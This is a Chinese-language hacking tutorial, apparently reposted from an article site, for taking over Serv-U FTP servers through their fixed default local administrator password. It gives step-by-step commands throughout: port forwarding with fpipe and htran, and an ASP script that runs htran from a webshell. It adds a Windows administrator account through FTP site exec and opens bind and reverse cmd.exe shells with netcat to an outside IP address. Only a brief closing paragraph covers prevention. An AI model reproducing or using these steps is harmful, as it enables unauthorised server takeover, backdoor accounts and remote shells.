serv-u 服務器的配置

理:
  serv-u默認監聽127.0.0.1:43958,在本機才能鏈接這個管理端口,serv-u默認管理帳號是LocalAdministrator, 默認密碼是"#l@$ak#.lk;0@P",這個密碼是固定的。在目標機器上運行fpipe -v -l 12345 -r 43958 127.0.0.1,而後在你本身的機器,用"serv-u administrator"新建SERVER,
目標IP:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
那麼目標機器的serv-u就歸你管了。


利用的前提:要有目標機器的普通權限的SHELL,不須要能終端或物理控制檯登陸,只要有個shell,能運行端口數據轉發的程序就能夠了

如何獲得一個shell:sql注射獲得webshell或者直接利用動網7.0 sp2如下的上傳漏洞上傳webshell

具體實施方法:
1.利用獲得的webshell上傳轉向程序fpipe,而後執行fpipe -v -l 12345 -r 43958 127.0.0.1
字串4


  2 .在你本身的機器,用"serv-u administrator"新建SERVER,依次填入
   ip:目標IP
    端口 :12345
    User:LocalAdministrator
    Pass:"#l@$ak#.lk;0@P"
  如今你就能夠管理這臺
服務器 的serv-u了,新建一個帳號,權限爲系統管理員(system administrator),並在"目錄訪問(Dir access)"選項中給予"執行"權限(execute).

  3. ftp鏈接,而後執行quote site exec net user iisuser password /add
添加一個用戶名爲iisuser密碼爲password的用戶,加到管理員組 quote site exec net localgroup administrators iisuser /add,如今就能夠鏈接終端並登陸了。 

  固然也能夠進行別的操做,例如上傳一個nc.exe,在目標機器上獲得一個管理員權限的shell,能夠正向鏈接,也能夠反向鏈接。
 
  正向鏈接:連上ftp之後執行 quote site exec nc.exe -l -p 23 -t -e cmd.exe
   這時目標主機就成了一臺telnet服務器,你能夠telnet上目標服務器的23端口.
  
   反向鏈接:假設你的IP是202.96.209.168
    1.先在本身的機器上運行(你要有一個外部IP):nc -vv -lp 99
      2.在目標機器上運行 nc -e cmd.exe 202.96.209.168  99 字串3
在你的機器上就會獲得一個目標機器的具備管理員權限的shell

  若是對方進行了端口過濾或者設置了
防火牆 的保護(這種保護不限制反彈鏈接,若是限制的話就要換別的方法呢),能夠用TCP SOCKET轉發來實現


打個比方:
個人機器爲 A
我要測試的機器爲 B[不容許正面鏈接]
我已經在B上獲得呢一個SHELL[只要guest的就行呢]

咱們能夠這樣連上對方的43958
I:我在本地監聽二個端口23和56
23是等待B來鏈接的~
56是等待我來鏈接的~

II:B鏈接我監聽的23,同時轉發到本地的43958

這樣管道就建好呢~對方的防火牆就拿咱們沒有辦法呢~

此時在本地運行SERV-U新建一個SERVER,IP填上本地的127.0.0.1端口爲56,用戶名LocalAdministrator,密碼#l@$ak#.lk;0@P

具體實施方法:
假設你的IP是 202.96.209.168
  1.在你本身的機器上運行 htran.exe -listen 23 56
 
  2.此時在本地運行SERV-U新建一個SERVER,IP填上本地的127.0.0.1端口爲56,用戶名LocalAdministrator,密碼#l@$ak#.lk;0@P
 
3。在目標機器上運行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23
若是不能在webshell下直接運行,能夠寫一個asp腳原本執行,內容以下 字串7

connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>

  執行
http://目標網址/connect.asp,若是出來一片空白,沒提示什麼錯誤,如今你應該能夠管理目標服務器的serv-u了

餘下的事情就看您自由發揮了。
htran.exe是一個多線程包轉發工具,能夠到紅盟下載
http://www.cnhonker.com/download/releases/Tools/HTran.rar

防止方法: 本身給serv-u打補丁,改變默認端口及管理密碼。改密碼要修改ServUAdmin.exe,ServUDaemon.exe這兩個文件,改端口只要在ServUDaemon.ini文件[GLOBAL]選項中加入LocalSetupPortNo=12345便可很遺憾,在serv-u的最新版本serv-u 5.2.0.0中依然沒有任何改變,默認的管理端口及密碼仍是原來的。
相關文章
相關標籤/搜索